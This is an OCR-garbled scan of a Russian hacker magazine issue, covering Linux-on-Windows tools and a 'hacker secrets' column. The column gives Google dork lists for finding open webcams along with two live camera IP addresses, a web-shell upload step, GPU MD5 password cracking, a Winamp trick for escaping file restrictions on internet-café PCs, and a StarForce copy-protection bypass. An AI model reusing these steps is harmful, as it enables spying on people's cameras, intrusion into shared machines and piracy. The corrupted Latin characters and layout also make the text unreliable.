ные вызовы І_іпих в вызовы ѴѴіпсІоѵѵв. Когда приложение пы- 
тается вызвать привычную для себя функцию І_іпих, ее работа 
не обламывается с ошибкой — вызов транслируется в набор 
системных вызовов самой Винды и успешно выполняется. Все 
это работаетзначительно быстрее, чем в любых виртуальных 
машинах, поскольку используется родное для ѴѴіпсІоѵѵв ядро и 
не тратятся ресурсы на виртуализацию. 

Несмотря на то, что с помощью соЫпих можно запустить не 
только линуксовые приложения, но и вообще сам туке, под- 
робно рассматривать мы его не будем. Зато остановимся на 
двух других проектах, которые используют соЫпих в качестве 
основы, но более дружественны к пользователю, избавляя от 
необходимости тратить время на настройку, которую в случае 
с «голым» пришлось бы выполнять вручную. Первым из этих 
проектов является апсІЫпих ( апсНіпих.огд ). 

г как сделать из ѵѵіыооѵѵБ ішіліти? 

Если тебя кто-то спросит«Что такое апсИ_іпих?», то лучше все- 
го ответить так: «Это практически полный дистрибутив ІІЬипІи 
І_іпих, который работает прямо в ѴѴіпбоѵѵз-системе!» Да-да, 
именнотак! В качестве ядра используется соЫпих, однако по 
возможностям апсІЫпих намного превосходит его. Для скачки 
с официального сайта доступен уже готовый к использова- 
нию дистрибутив. В общем-то, обычная программа, если не 
считать вес: 131 Мб для версии с графической оболочкой ХРСЕ 
и минимальным набором утилит — и аж653 Мбдля полной 
версии с КйЕ. Еслиты незнаешь, что это такое, выбирай 
второй вариант— не ошибешься. 

Установка пакета в систему ничем особенным не выделяется, 
но придется ответить на несколько вопросов мастера, указав 
некоторые параметры работы апсНЫпих: 

1 . Количество оперативной памяти, которое смогут использо- 
вать І_іпих-приложения, лучше выбирать«не менее 256 Мб», 
хотя все будет работать, даже если выделить лишь 128. 

2. Что касается вопроса, как запускать апсНЫпих, советую 
выбрать варианте автоматическим запуском в виде сервиса 
ѴѴіпсІоѵѵв. 

3. Чтобы надстройка имела доступ к основной файловой 
системе, придется настроить ЗатЬа (специальный сервис в 
піх-системах, позволяющий подключаться к расшаренным 



> ѵѵагпіпд 

Ѵігіиаі Безкіор, 
соЫпих, апсІЫпих 
будут работать 
только на 32-битных 
версиях ѴѴіпсІоѵѵв 
2000, ХР, 2003, Ѵізіа. 
Поддержка 64- бит- 
ной платформы пока 
существует л и ш ь в 
планах. 



> СІѴСІ 

В качестве бонуса мы 
подготовили на диске 
апсІЫпих и некоторые 
другие программы. 



Меню для запуска^ 
программ. Неопытные! 
пользователь даже не! 
узнают, что все они, на! 
самом деле, линуксовые" 
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ІЗРІІ позволяет получить знакомую юниксоидам командную оболочку ВА5Н 
|прямо в ВиндеД^ — Г ^ _ ' 



|Красивая Шео ѴіНиаІ Резкіор 



оніа 



ахуРТР 



мутей 



КБЕ под ѴѴіпсіошз 



д пта рэ і н&е ебм еиие 



Еще зимой вышла финальная версия графической оболочки КБЕ 
4.0, получившая новый пользовательский интерфейс и улучшен- 
ную внутреннюю архитектуру. В ЮЗЕ 4.0 входят браузер Копциегог, 
текстовый редактор Капе, карта-глобус МагЫе, оконный менеджер 
КѴѴіп, офисный пакет КОШсе, новый файловый менеджер ОоІрЬіп 
и другие приложения. Но самое интересное, что разработчики 
всерьез взялись за создание портированной версии КИЕ на Мае 05 
X и ѴѴіпсіо\ѵ5 ! Посмотреть на результаты разработчиков можно уже 
сейчас, скачав инсталлятор отсюда с ѵѵіпкбе.ог^/риЬ/Ые/рогЩ/ 
ѵуіпЗ 2 /іпзіаііег / . 



БуарПеіР* 



рс_гопе 






^ РЕШЕНИЕ НАПОСЛЕДОК 

Возможно, наш опытпревращения Винды втукс на этом бы и закончился, 
если бы 1 9 мая этого года компания Шео не объявила о запуске бета-тес- 
тирования своего нового приложения — Шіео Ѵігіиаі РеБкІор [ уууууу.иЙео. 
сот/Ьоте/еп/ѵігІиаІсІеБкІор ). По сути, почти то же самое, что и апбЫпих. 
Новинка также основана на соЫпих и позволяетзапускать самые разные 
никсовые приложения без необходимости перекомпиляции. В связи с 







ГоСТвВО* 


о пс рацион нач 




стсрзц ионная 


СітСТОМІ А 




система 0 


Виртуальная 




Виртуальная 


иашина А 




машина В 



ГіІЛерЕ’НЭОР (Монитор ВІгіртуаЛЬНОЙ М ЯШИНЫ) 



В чем фишка рабо- 
ты соілпих? 

ѴМѵѵаге — это универсальное средство виртуализации, позволяю- 
щее запустить несколько гостевых систем с разными операционками. 
Для каждой из них она создает виртуальную машину и таким образом 
тратит колоссальные ресурсы компьютера на эмуляцию аппара- 
туры, а также работу гипервизора, который обеспечивает доступ 
«виртуалок» к физическому аппаратному обеспечению. В результате, 
все вместе работает очень медленно. Ситуацию обещает исправить 
поддержка аппаратной виртуализации в современных процессорах. 
СоЫпих — это порт стандартного ядра Ілпих, работающий как 
один процесс в операционной системе Місгозой. Вместо того 
чтобы эмулировать всю систему, разработчики модифицирова- 
ли ядро Ілпих так, чтобы оно запускалось как обычный процесс 
ОС. Никакой виртуализации оборудования не происходит, 
однако ядру тукса «подсовывается» виртуальная прослойка, ко- 
торая транслирует вызовы Ілпих в вызовы ѴѴіпсІоѵѵз. Аппаратные 
затраты в этом случае минимальны, и приложения работают не- 
сравнимо быстрее. Но об универсальности приходится забыть. 



ресурсам сетей МісгобоЙ). Для этого необходимо создать папку в Винде и 
сделать ее доступной из сети (расшарить), а во время установки апсИ_іпих 
— указать ее имя и, если требуется, логин и пароль для доступа. 

После установки в системе появляется панель (в случае дистрибутива с 
ХЕСЕ) или иконка втрее (в случае КОЕ), с помощью которой и запускаются 
предустановленные І_іпих-приложения. Для рядового пользователя это 
выглядит как набор самых обычных программ! Ничуть неудивительно, 
ведь все они имеютпривычное для ѴѴіпсіоѵѵб обрамление (в отличие от 
уродливого Судѵѵіп’а). Поэтому перепутать «чужеземца» с обычной про- 
граммой очень просто! 

Можно запустить абсолютно все, что и в ІІЬипІи І_іпих. По крайней 
мере, никаких ограничений мы не нашли и без проблем наставили 
кучу софта из репозиториев ІІЬипІи, воспользовавшись пакетными 
менеджерами арі-деі и Эупарііс. Если ты с ним еще не знаком, это 
твой реальный шанс оценить их мощь и удобство. Открыл окошко, 
нашел название нужной программы, нажал «Установить» — вот и 
вся установка. Менеджер сам закачает нужные файлы дистрибутива, 
а также все необходимые библиотеки и предоставит пользователю 
готовое для запуска приложение. Это даже проще, чем поставить 
программу в ѴѴіпсіоѵѵб! Естественно, ничто не мешает собирать 
программы из исходников. В общем, апсИ_іпих работает потрясающе, 
и единственным неудобным моментом можно счесть разве что обмен 
файлами между ѴѴіпсіоѵѵб и і_іпііх посредством расшаренных папок и 
ЭагпЬа. 
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Аппаратное обеспечение 
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Установка ѴѴіпсІоѵѵв Зегѵісезіог Ы N IX ничем не отличается от 
установки обычного приложения 



Командная строка Судѵѵіп’а, не интегрирующаяся в систему,— 
явно не предел мечтаний 



тем, что это еще ранняя бета, разработчики рекомендуют 
использоватьтолько предустановленный набор программ 
(Кореле, Копдиегог, КРсК, ОІМР ит.д.), которые запускаются 
из специального меню сразу после установки пакета и не 
требуют какой-либо дополнительной настройки. Но если 
не брать в расчетэто ограничение (тем более, приложения 
устанавливать на самом деле можно, правда, на свой страх 
и риск), то уже сейчас можно выделить несколько серьезных 
преимуществ разработки перед апбЫпих (справедливости 
ради замечу, что окончательного релиза у этой разработки 



также не было). 

Разработчики ШеоѴНиаІ йевкіор намного удобнее реали- 
зовали систему обмена файлами с ѴѴіпсІоѵѵв. Папка учетной 
записи пользователя в ѴѴіпсІоѵѵз автоматически монтируется в 
домашнюю папку І_іпих, что несравнимо комфортнее, нежели 
обмениваться через расшаренные ресурсы. Отличная подде- 
ржка звуковой системы и принтеров прямо «из коробки» — еще 
один конек системы. Остается то ль ко добавить автоматичес- 
кое обновление программы и синхронизацию данных через 
интернет. Искренне надеюсь, чтоѴіііиаЮезкІор будет быстро 



В апсИ_іпих входят пакетные менеджеры арѣ-деі: и Зупарбс, с помощью которых можно легко установить множество линуксовых 
приложений 





> ІП^О 

• Во время работы с 
соЫпих и разра- 
ботками, на ней 
построенными, тебе, 
возможно, потребу- 
ется пароль гооПа. 
Вариантов стандарт- 
ного пароля всего 
три: пустой пароль, 
«гооі», «соііпих». 

Все зависит от 
сборки. 

• Во время установ- 
ки ѴігШаІ Оезкіюр 
создает на жестком 
диске файл размером 
примерно в 5 Гб, в 
котором распола- 
гается виртуальная 
файловая система. 
Его можно забэка- 
пить или перенести 
на другой компьютер 
сустановленной 
надстройкой. 

■ 
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ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 



ЛЕОНИД «ВОЮ» ОТРОЙКОВ 

/ пою» млн.. пи / 



Базу Наск} 



№1 

ЕДДДД ПРОВЕСТИ ОБФУСКАЦИЮ РНР-КОДА 

НИЕ: 

В прошлом номере ][ мы уже говорили о такой проблеме, как запутывание 
собственного РНР-кода. С научной точки зрения, сей процесс называется 
обфускацией — приведением исходного текста исполняемого кода к виду, 
сохраняющему функциональность программы, но затрудняющему анализ 
и понимание алгоритмов ее работы. Сегодня мы решим задачу, пользуясь 
утилой от хакера ОХ под названием РНР ОЬГизсаІог. Скрипт написан пол- 
ностью на РНР и предоставляется автором свободно и в открытом виде. 
Коротко ознакомлютебя с основными возможностями обфускатора: 

1. Скрипт имеет веб -интерфейс , поддерживает обфускацию 
имен переменных, имен функций, методов классов, шифро- 
вание статических строк (без переменных) , а также сжатие 
РНР-кода (удаляются лишние пробелы, комментарии и т.п. ) . 

2 . Есть возможность указать переменные , функции, которые 
не следует заменять, а также функции, параметры которых 
не следует заменять . 

3 . Можно выборочно отключить обфускацию строк /пере- 
менных/ функций . Для каждого типа также есть по два вида 
обфускации . 

4 . Не поддерживаются конструкции $$ѵаг_паше и еѵаі, пос- 
ле обфускации необходимо будет поменять соответствующие 
имена функций в функциях, устанавливающих манипуляторы 
(например, оЪ_д2Ііапс11ег ) . Не поддерживаются вызовы функ- 
ций по их именам из строк . 



Как видишь, достоинств у тулзы намного больше, чем недостатков. Теперь 
рассмотрим, собственно, алгоритм наших действий, направленных на 
обфускацию нужного РНР-кода: 

1. Выбираем любой веб-шелл с дирой на 777 либо бесплатный/платный 
хостинг. 

2. Заливаем в веб-диру (например, / ітд ) файл дхоЫ: . рЪр (обфускатор). 

3. Переходим полинку к нашему скрипту, например: 
ііЬѣр : / /ЬозЬ . сот/ітд/сІхоЫ: .ріір 

4. В поле «Исходный код РНР-файла» вбиваем код, который необходимо 
обфусцировать. 

5. Отмечаем понравившиеся галки в меню«Опции обфускации». 

6. Жмем баттон и довольствуемся результатом. 

Скрипт имеет множество настроек и опций, посему процесс обфускации 
стал еще приятнее и удобнее :). 



Запутываем наш скрипт 



І'ІІ» 1 'Ч 


і. м.імі;: . « .г. . 




■1 















- Т - 
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ЗАДАЧА: 



] ОТЫСКАТЬ ВЕБ-КАМЕРЫ С ОТКРЫТЫМ ДОСТУПОМ 

РЕШЕНИЕ: 



Думаю, ты не раз задавался целью поиска открытых веб-камер в Сети. Не спорю, 
наблюдать за людьми/событиями на другом конце Земли (или офиса :)) довольно 
забавно. Удобнее всего осуществлять поиске помощью любимого Гугла. При со- 
ставлении запросовтебе поможетзнаменитый ресурс ЬйрУ/іоЬппѵ.іЬаскзіиГГ.сот . 
Наиболеежизнеспособные запросы я приведу в качестве примера: 



іпигі : " ѴіеУ7егРгате?МосІе= " 
іпигі : пеСѵ7_Сср . зЬбіпІ 
іпСіСІе: " зирегѵізіопсат ргобосоі" 
іпигі :Сді5багС?раде=Зіпд1е 



іпигі : іпбехРгате . зЬСт1?пеу7зСу1е=<2иасІ 
іпбіСІе : ІіѵеаррІеС іпигі :ЬѵАрр1 
іпигі : /з1іоѵ7саш.р]ір?саші(і 
іпигі : ѵібео . сді?гезо1иСіоп= 
іпигі : ітаде?сас1іеЬизС= 
іпбіСІе: "Ьіѵе Ѵіеѵ7 / — АХІ5" | 
іпигі : ѵіеѵ7/ѵіеѵ7 . зЬСтІ 

іпбехб : "МОВОТІХ МІ" п| 



Учимся подсматривать 



іпбехб: "Ореп Мепи" 
іпбібіе : зпс-ггЗО 
іпигі :1юте/ 

іпигі : "МиІСіСатегаРгате?Мос1е= " 
іпСіСІе: "ЕѵоСат" 
іпигі: "ѵ/еЬсат. ЬСтІЗдиоС ; 
іпбіСІе: "Ьіѵе ЫеСЗпар Сат- 
Зегѵег іеесі" 




► 038 
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іпДікІе: "Ьіѵе Ѵі ем / — АХІ5 206М" 

іпкіЫе: "Ьіѵе Ѵі ем / — АХІ5 206М" 

іпСіЫе: "Ьіѵе Ѵіем / — АХІ5 210" 

іпигі : іпсІехРгате . зЬЬшІ Ахіз 

іпигі : " ѴіемегРгате?Мосіе= " 

іпигі : "МиІЬіСатегаРгате?Мос1е=Мо1:іс>п" 

іпЬіЬІе : зЬагЬ іпигі : сдізЬагІ: 

іпЬіЬІе: "ѴЫГ-ЫТІ04 Маіп Раде" 

іпЬехЬ : "МОВОТІХ М1 " іпЬехЬ : "Ореп Мепи" 

іпЬехЬ: "МОВОТІХ МІО" іпЬехЬ: "Ореп Мепи" 

іпЬехЬ: "МОВОТІХ Ы0" іпЬехЬ: "Ореп Мепи" 

іпЬіЬІе : зпс-220 іпигі :Ь.оше/ 

іпЬіЫе : зпс-сзЗ іпигі: коте/ 

іпЬіЬІе : зпс-ггЗ 0 іпигі :коте/ 

іпЬіЫе: "зопу пекмогк сашега зпс-рі" 

іпЬіЬІе: "зопу пебмогк сашега зпс-ші" 

зіЬе: . ѵіемпебсат. сот -ммм. ѵіемпексат. сот 

іпЬіЬІе: "ТовкіЪа ЫеЬмогк Сашега" изег Іодіп 

іпЬіЬІе: "пексат Ііѵе ітаде" 



іпЬіЫе: " і-Сакскег Сопзоіе — Ѵ7еЬ МопіЬог" 
іпигі : /коте/коте 

іпЬіЫе : ГІехмаЬск іпЬехк: "СоругідкЬ Ьу Зеуеоп ТЕСН Со" 
іпкіЫе : " зпс-ггЗО коте" 
іпкіЫе: ЫеЬмогк сатега 

Как видишь, каждый из запросов ориентирован на конкретный тип 
веб- камер, поэтому ты запросто можешь сконструировать несколь- 
ко собственных. Алгоритм наших действий достаточно прост: 

1 . Определяемся стипом веб-камеры, доменной зоны, еіс. 

2. Идем на Гугл и составляем интересующий нас запрос. 

3. Кликаем по линкам и наслаждаемся (иногда даже админскими правами). 
Чтобы не быть голословным, оставлютебе на растерзание два рабочих 
линка на веб-камы: 

кЬЬр : //65 . 254 . 62 . 79/Сді5ЬагЬ?раде=Зіпд1е&Ьапдиаде=0 
кЬЬр :// 84. 45. 154. 218: 2220/Сді5ЬагЬ?раде=Зіпд1е&Ьапдиаде=0 

Но учти, подглядывать — нехорошо. 




1 . Видеокарта потребуется Ыѵісііа ЭР86006Т (или выше) 

2. В ѴѴіпсІоѵѵз ХР нужно установить последние драйверы РогсеѴѴаге: 
169.21. 

3. Запускаем утилу: 



ЗАДАЧА: 



1 МАКСИМАЛЬНО БЫСТРО СБРУТИТЬ М05-ХЭШ, НЕ ИС- 
ПОЛЬЗУЯ РАИВО^-ТАБЛИЦ 

РЕШЕНИЕ: 



Какты знаешь, большинство утил для брута мд5-хэшей довольно 
медлительны. Принцип их действия основывается на использовании 
мощностей процессора твоего компа. Однако, утила СІША в своих 
«вычислениях» юзает видеокарту N ѵі сі іа (а точнее, ее мультипроцессо- 
ры, коих в последних версиях около 1 6). Результат подобного подхода 
налицо — сумасшедшая скорость перебора паролей. Рассмотрим все 
необходимые действия: 



пѵСІГОА.ехе -Г=тураз.ЬхЬ -з=7 -е=7 
Где: 

-I- — файл с паролями до 50 шт., типа абтіп: 998 7д.22788е81 01 16а45 
1 09И2еа88648\ 

-з= — начальное количество символов в пароле (6 — по дефолту); 

-е= — конечное количество символов в пароле (8 — по дефолту). 

4. Необходимые библиотеки и утилу ты найдешь на нашем 0Ѵ0. 

Скорость перебора составляет на заявленной видеокарте порядка 1 05 млн 
паролей в секунду, так что — дерзай. 



Только для Ыѵісііа 



Л С:ШІі^ , ОѴ$\іуітяп52іі:тіі &и& 


-! а 


М - 1 : га и>1 1 ІР 1 1 1 іАчі .г:*. Н Г Г Ее р ікч 5.1. ПіП 1 
<С> Корпорации ПалІкросаФі ѵ 




ЬчОѵсіігкмі; йркі ЙиИ щзЧ«иіН1:'чіѵй(ІІЙ'чиРІ'І(М 
ІікіЫ іогі <СРЮ Сіоск і-ліе- і . 350 

рсгс іх по іісѵісе (ДІ0Ч. 






ЗАДАЧА: 



5 ПОЛУЧИТЬ ДОСТУП к файлам на компе 
В ИГРОВОМ КЛУБЕ 
РЕШЕНИЕ: 



Сегодня каждый уважающий себя клуб либо интернет-кафе управляются 
при помощи специальной проги. В обязанности ее клиентской части мо- 
жет входить контроль интернет-трафика, времени пользования, ограни- 
чение управления компом и т.п. Нас будет интересовать доступ к файлам. 
Следующий метод будет работать во многих клубных системах — рас- 
смотрим его на примере СІиЬСопІгоІ ( \ллл/ѵѵ.с[иЬсоп1:го[.ги ). Если тестим в 
клубе, первые два пункта, естественно, можем пропустить. 



1 . Ставим «СІиЬСопіхоІ Сііепі». Прога с русским интерфейсом, поэтому 
разобраться не составит труда. Вводим заранее оговоренный пароль. 

2. Создаем раздел с любым именем: «Раздел -> Добавить раздел». 
Добавляем ярлык для запуска: «Раздел Добавить ярлык». В качестве 
экзешника выбираем наш ѵѵіпатр (надеюсь, этот редчайший плеер у тебя 
установлен). 

3. Итак, подготовка закончена. Щелкаем по ярлыку, в Винампе вызыва- 
ем диалог открытия файла (в моей версии «Ореп ПеЫ») и ... получаем 
доступ лишь к разрешенным файлам и папкам (в отдельных случаях, 
когда местные админы слишком ленивы — ко всему компу). Обычно для 
пользователя отводится своя папка. Можно сливать файло со своей 
флешки на комп и обратно, удалять, запускать и изменять файлы в 
своей директории. 

4. Но много радости это нам не доставит, поэтому в поле для ввода имени 
открываемого винампом файла нагло пишем «С:». Несмотря на то, что в 
спускающемся меню «Папка» дальше собственной директории нам уйти 
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не удавалось (до ввода «С:» все было скрыто), а теперь при клике по 
этому меню плеер вылетает сошибкой, — восновном окне диалога 
выбора файла мы свободно распоряжаемся всеми файлами на диске 
С. До содержимого остальных жестких дисков и С 0/йѴО- приводов 
можно добраться аналогично; вспоминаем английский алфавит и 
вводим в поле «Имя файла» — «О:», «Е:», «Р:» и так далее. 

У данного подхода есть один большой минус: несмотря на свою 
популярность, ѴѴіпатр’а может не оказаться в игровом клубе. Плю- 
сами являются универсальность по отношению к клубным прогам и 
возможность экспериментировать: получаем через прогу, уста- 
новленную на компе игрока, доступ к ехріогег’у, и пытаемся обойти 
ограничение. 

Хочется отметить, что все ваши манипуляции при желании легко 
просматриваются (а возможно, логируются) с админского компа 
клуба, поэтому при выборе музыки стоит поторопиться :). 



Новое применение старым прогам 





ЗАДАЧА 



]ОБОИТИ 5ТАВР0КСЕ ДЛЯ ЗАПУСКА ИГРЫ С ОБРАЗА 

РЕШЕНИЕ: 



Старфорс — всем известная система защиты дисков, основанная на их 
физическом строении. 

1. Будем исходить из того, что у нас на руках уже есть образ диска, 
считанный на низких скоростях (1х-4х) с ВМ Р5 (физическая подпись за- 
писываемого диска). В противном случае для качественного создания 
образа лучше всего юзать Аісобоіі 20% при всех включенных опциях 
эмуляции и типе данных 51:агРогсе. 

2. Допустим, мы имеем дело со ЗіагРогсе 3.4.49.x (различные версии, в 
том числе более ранние, имеютсвои способы обхода). Качаем утилиту 
51:агРиск ( Ыаск2кпіаИЕпт.ги/5і:агіиск ѵ0.83Ве1:а2-Ви5.ехе ) — версия 
0.83 вполне подойдет. Тем, кто не дружит с английским, беспокоиться 
не стоит, найти наш вариант не составиттруда. Запускаем. 

3. Выбираем нашу версию защиты ЗіагРогсе из списка справа. В даль- 
нейшем нужно будет указывать именно ее. 

4. Заходим в « РІ астро йки». Заполняем поля с путями до Оаегпоп Тооіб 
и Алкоголя. Метод патча сб-гот’ов оставляем «СуперАгрессив- 
ный», ожидание образа — 1 000. В мен юшке «СОРоітГы находятся» 
указываем, как подключены наши дисководы. Если что-то пойдет 

не так, то придется выключать комп и отсоединять их вручную, 
указывая в менюшке «у меня нет СОРот'ов». Также будет полезна 
прога З^агРогсеЫідбІтаге, которая позволяет более точно подойти к 
делу отключения приводов (15 различных вариантов и комбинаций 
— напротив каждого варианта есть кнопка «Включить»). Применяем 
настройки, запускаем утилу еще раз. 



5. Щелкаем «Патчить ВІ_І5І». Выбираем «Выключить Сй». 

6. Добираемся до менюшки «Генератор ярлыков». Сразу же меняем 
версию защиты на правильную в правом верхнем углу. Тип запуска 
«Запускать с ЕХЕ». Далее выбираем, в чьем виртуальном приводе будет 
работать образ диска (Даймон/Алкоголь). Кликаем «Указать ЕХЕ» и 
выбираем экзешник игры, с которого ее обычно запускают. Соседней 
кнопкой показываем путь до образа. Поле «Параметры запуска ЕХЕ» 
оставляем пустым. 

7. Готово. Создаем ярлык и используем его для запуска нужной игрушки. 
Во избежание недоразумений: информация предоставлена только 

для тех, кто имеет оригинальный диск и просто ленится совать его в 
СР-РОМ. 



Стопроцентная защита? 




9 % прь» м 








ЗАДАЧА 



3 ИЗМЕНИТЬ ПАРАМЕТРЫ ОКНА ЗАПУСКАЕМОГО ПРИ- 
ЛОЖЕНИЯ ИЗ-ПОД ОТЛАДЧИКА 
РЕШЕНИЕ: 



Для чего это может понадобиться? Например, иногда бываетнеобходимо 
изменить размер окна, которое не «растягивается» стандартными мето- 
дами. Конечно, в таком случае можно использовать какую-либо утилиту, 
которая специально предназначена для манипуляции с окнами путем 



посылки им системных сообщений, но это — не путь настоящего крэкера 
:). Мы используем более изощренный метод, причем его можно применять 
не только для манипуляции с окнами, но и для задач сугубо «системного» 
толка. Ведь метод этот — подмена данных, передаваемых АРІ-функции. 
Первое, что намтребуется узнать, — какая АРІ-функция создаетокно. Лезем 
в справочник и получаем ответ: СгеаІеѴѴіпсІоѵѵЕхМ (есть и другие функции, 
но будем считать, что мы их откинули, действуя методом исключения). Пос- 
летого, как мы это выяснили, остается одно — поста вить точки останова на 
все вызовы данной функции, дождаться инициализации (а, следовательно, 
и остановки на нужном месте) программы под отладчиком, исследовать пе- 
редаваемые параметры. Затем найти среди нихте, что отвечаютза размеры 
окна и подменить их либо в стеке, либо непосредственно по адресу, откуда 
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происходит извлечение этого параметра. 

Рассмотрим этот несложный механизм на примере стандартного приложе- 
ния поіерасі.ехе, которое мы столько раз терзали. 

1. Открываем поіерасі.ехе для отладки под ОИуйЬд; 

2. Устанавливаем точки останова на все вызовы СгеаІеѴѴіпсІоѵѵЕхѴѴ: для 
этого нажимаем комбинацию клавиш <АІ_Т+Р1 > и в появившееся окно 
вводим «Ьрх СгеаІеѴѴіпсІоѵѵЕхѴѴ»; 

3. Запускаем программу нажатием <Р9>. Выполнение будетпрервано по 
адресу 01 004694И. Вот что мы увидим: 

0100466В РБЗН БШКБ РТЕ БЗ: [1009А70] ;НеідЫ: = 139 (313 . ) 
01004671 МОѴ Е8І,по*:ерасІ. 01001394 

01004676 РІІЗН БѴГОРБ РТР БЗ : [1009А74] ; ѴУісІЫі = 39А (922 . ) 
0100467С РІІЗН БШКБ РТР БЗ : [1009А7С] ;У = СА (202 . ) 
01004682 РІІЗН БШКБ РТР БЗ : [1009А78] ;Х = 52 (82 . ) 
01004688 РІІЗН 0СР000 0 ; стилевые характеристики 

0100468Б РІІЗН ЕЗІ ; имя окна 

0100468Е РІІЗН поБерасІ. 01009020 ;С1азз = «ЫоЬерасЗ» 
01004693 РІІЗН ЕВХ ; стилевые характеристики 

01004694 САББ БШКБ РТР БЗ : [<ШЗЕК32 .СгеаБеѴ/іпйоотЕхТС>] 

; вызов функции 

Какты можешь догадаться, по адресам 01 00466В и 01004676 располага- 
ются инструкции, выполняющие помещение в стекзначений, которыми и 
определяется, соответственно, высота и ширина создаваемого окна. 
Ставим точку останова по адресу 01 00466В и перезапускаем программу под 
отладчиком. 

4. После того, как мы остановимся по адресу 01 00466В, у нас появится, как 
минимум, два пути решения нашей задачи: первый — подменить да иные 
непосредственно в стеке, и второй (наиболее предпочтительный) — изме- 
нить значения, находящиеся по адресу, который использует инструкция 
РУ5Н в качестве операнда. Инструкция выглядит следующим образом: 



РІІЗН ОѴѴОРй РТР Б5:[1 009А70]. Это означает, что мы должны произвести 
подмену данных, находящихся по адресу 1 009А706. В окошке Ьех-дампа 
(которое находится «слева-снизу», под окном, содержащим листинг дизас- 
семблирования) проследуем по этому адресу, выделим мышью два байта, 
которые содержатзначения 39 и 01 и выберем из меню правой кнопки 
мыши пункт«Віпагу-^ ЕсПі». После этого можно смело вбивать в появив- 
шемся окнедругое двухбайтовоезначение, задающее высотуокна. Чтобы 
почувствовать «эффект», советую ввести значения «РЕ РР». 

5. Следующий (и последний) шаг — запуск программы по <Р9>. 

Обрати внимание, что АРІ-функция СгеаІеѴѴіпсІоѵѵЕхА приняла новые 
данные, результатом чего явилось изменение вертикальных размеров окна 
«Блокнота». Что и требовалось получить! 



Набор данных, передаваемый через стек функции СгеаІеѴѴіпсІоѵѵЕхА 





ЗАДАЧА 



^ ЗАМАСКИРОВАТЬ ВЫЗОВ АРІ-ФУНКЦИИ р ЗАМЕНИВ 
ЕГО БОЛЕЕ СЛОЖНЫМ, НЕЯВНЫМ, ВЫЗОВОМ 

РЕШЕНИЕ; 



Думаю, ты сразу понял, для чего необходима маскировка. Конечно, единст- 
венная ее цель — затруднить задачу реверсера. Здесь есть где разгуляться 
фантазии кодера! Можно вызывать функцию через серию переходов, можно 
вычислять адрес функции путем математических преобразований, да мало 
ли что еще можно придумать :). Чем необычнее подход, тем больше вероят- 
ность, что реверсер отступится отзащищаемой программы. 

Для начала рассмотрим пример маскировки вызова с заменой конкретного 
адреса функции вычисляемым значением. 

1. Ставим точку останова на маскируемую АРІ-функцию. 

2. Запускаем программу на исполнение (Р9). 

3. После остановки программы на месте вызова маскируемой АРІ-функции 
выполняем один шаге заходом в подпрограмму (Р7). 

4. Записываем адрес, по которому мы находимся после выполнения саіі-а 
(этот адрес фактически является адресом АРІ-функции, и находимся мы в 
недрах конкретной библиотеки сіЩ. 

5. Находим любую «свободную зону» в РЕ-файле — то есть зону, где распо- 
ложен массив нулей, необходимый для выравнивания секций. 

6. Вызов АРІ-функции заменяем безусловным переходом на начало масси- 
ва нулей (вида «ітр адрес»). 

7. Переходим к массиву нулей — заполняем его следующими инструкциями: 

а) инструкциями, которые производят вычисление адреса вызова — именно 
вычисления по несложному алгоритму (единственное обязательное усло- 



вие здесь: чтобы адрес АРІ-функции нигде не присутствовал в явном виде). 

б) перехода по вычисленному адресу, помещенному в регистр (например, 
«саііеах»). 

в) безусловного перехода по адресу инструкции, которая следовала за 
вызовом маскируемой АРІ-функции. 

Теперь, когда ты знаешьтеорию, можно применить этот несложный алго- 
ритм на примере изменения простого РЕ-файла «ех.ехе», который вызывает 
функцию МеззадеВохА, под отладчиком ОІІуйЬд. Этом, как это сделать, ты 
можешь прочитать на нашем ЭѴО или посмотреть мой видеоурок. ц-Ц 
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ОБЗОР эксплойтов 



ЭТОТ НЕОБЫЧНЫЙ ВО ВСЕХ ОТНОШЕНИЯХ ОБЗОР ПОСВЯЩЕН ОШИБКАМ ОТЛАДЧИКОВ, ПРИВО- 
ДЯЩИМ КУТРАТЕ КОНТРОЛЯ НАД ОТЛАЖИВАЕМЫМ ПРИЛОЖЕНИЕМ ЕЩЕ НА СТАДИИ ЗАГРУЗКИ 
ЕХЕ-ФАЙЛА В ПАМЯТЬ. ДЛЯ ИССЛЕДОВАТЕЛЕЙ МАЛ ВАРИ ЭТО ЗАЧАСТУЮ ЗАКАНЧИВАЕТСЯ КА- 
ТАСТРОФОЙ — ТОЛ ЬКО ХОТЕЛ ВЗГЛЯНУТЬ НА ОЧЕРЕДНОГО ЗВЕРЬКА ПОД ОТЛАДЧИКОМ НА СВО- 
ЕЙ ОСНОВНОЙ МАШИНЕ, КАК ОТЛАДЧИК ПРОСКАКИВАЕТ ТОЧКУ ВХОДА И ЖИВЧИК ПОСЕЛЯЕТСЯ 
НАКОМПЬЮТЕРЕ, ИЩИ ЕГО ПОТОМ! 



п Л 5Ѵ5ЕК 

I I ПРОСКОКЕР 
V# I НА СЕТЕВЫХ И 
СМЕННЫХНОСИТЕЛЯХ 



» Вгіе? 



Работая с отладчиком Бузег версии 
1 .95.1 900.0894, выпущенной в начале 
2008 года, я обратил внимание, что 
при загрузке программ с сетевых 
дисков и сменных носителей (типа 
дискет) отладчик проскакивает 
точку входа в файл (она же Епігу 
Роіпі или, сокращенно, ЕР). Он 
передает подопытной программе 



бразды правления иутрачивает 
над ней всякий контроль (впрочем, 
глобальныеточки останова на АРІ- 
функции срабатываютнормально, 
если, конечно, незабытьзаблаговре- 
менно их поставить). Мне пришлось 
отослать разработчикам баг-репорт, 
получив подтверждение об ошибке 
вкупе с обещанием ее исправить, 
но версии Бузег’а продолжают 
выходить одна за другой, а ошибка 
как была, так и осталась. Почему 
же она вообще возникает? Откуда 
берется и отчего никуда не девается? 
Дело в том, что механизм загрузки 




Попытка загрузки файла с сетевого диска в Бузег ведет к «проскоку» точки 
входа в файл и утрате контроля над отлаживаемым приложением 



файлов сжестких дисков и сменных 
носителей принципиально различен. 
Исполняемые файлы (и динамичес- 
кие библиотеки), расположенные на 
винчестере, операционная система 
просто проецирует в память, что 
(грубо говоря) превращает их в «файл 
подкачки, доступный только на 
чтение». Подкачка страниц с диска 
в оперативную память происходит 
только по мере обращения к ним, а 
при недостатке памяти немодифици- 
рованные страницы не вытесняются 
в настоящий файл подкачки, а просто 
высвобождаются под новые данные. 
Действительно, какой смысл запи- 
сывать их в своп? Проще вновь об- 
ратиться к исполняемому файлу — он 
же никуда не денется за это время. 
Вернее, с жесткого диска не денется 
(и потому система блокирует к нему 
доступ на время выполнения), а вотс 
